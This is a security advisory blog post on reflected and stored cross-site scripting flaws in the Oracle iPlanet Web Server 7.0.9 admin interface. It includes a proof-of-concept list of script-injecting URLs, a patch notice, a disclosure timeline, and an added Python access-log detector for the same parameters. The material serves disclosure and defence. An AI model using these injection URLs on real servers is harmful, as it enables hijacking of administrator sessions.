Sunday, April 29, 2012

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Earlier versions may also be affected.


Proof of concept
Reflected XSS
===========
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
=========
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
=================
http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=

Solution
Oracle has released patches which address these issues. Please see the references for more information.
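
To check whether the admin interface has received requests of this shape, the following added example (not part of the original advisory and not Oracle tooling) scans access-log lines for the two endpoints listed above and flags the affected parameters when they carry markup characters. It assumes Common Log Format and that the height and width parameters are meant to be numeric; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameters taken from the proof-of-concept URLs in this advisory.
WATCHED = {
    "/admingui/version/Masthead.jsp": {"productNameSrc", "productNameHeight", "productNameWidth"},
    "/admingui/cchelp2/Navigator": {"appName", "pathPrefix"},
}
# Assumption: these two carry pixel sizes, so anything but digits is suspect.
NUMERIC = {"productNameHeight", "productNameWidth"}
# Characters needed to break out of an attribute, comment, or tag context.
MARKUP = re.compile(r"[<>\"']")
# Assumption: Common Log Format; only the quoted request line is inspected.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return sorted (param, decoded_value) pairs worth investigating, else []."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    watched = WATCHED.get(url.path)
    if not watched:
        return []
    hits = []
    # parse_qsl percent-decodes, so encoded values (%3C, %22, ...) are caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in watched:
            continue
        if MARKUP.search(value) or (name in NUMERIC and value and not value.isdigit()):
            hits.append((name, value))
    return sorted(hits)

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '192.0.2.10 - admin [29/Apr/2012:10:00:01 +0000] "GET /admingui/version/Masthead.jsp'
    '?productNameSrc=../images/VersionProductName.png&productNameHeight=42&productNameWidth=221 HTTP/1.1" 200 512',
    '192.0.2.77 - - [29/Apr/2012:10:00:05 +0000] "GET /admingui/version/Masthead.jsp'
    '?productNameSrc=x&productNameHeight=42&productNameWidth=%22%3E%3Cx%3E HTTP/1.1" 200 530',
    '192.0.2.77 - - [29/Apr/2012:10:00:09 +0000] "GET /admingui/cchelp2/Navigator'
    '?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix=%27%22--%3E HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in suspicious_params(line):
            print(f"{name}={value!r}  <-  {line[:60]}...")
```

A hit on `appName` or `pathPrefix` is worth following up even if the response looked harmless, since the advisory describes those values as stored and rendered on a later request to the Navigator page.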

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.
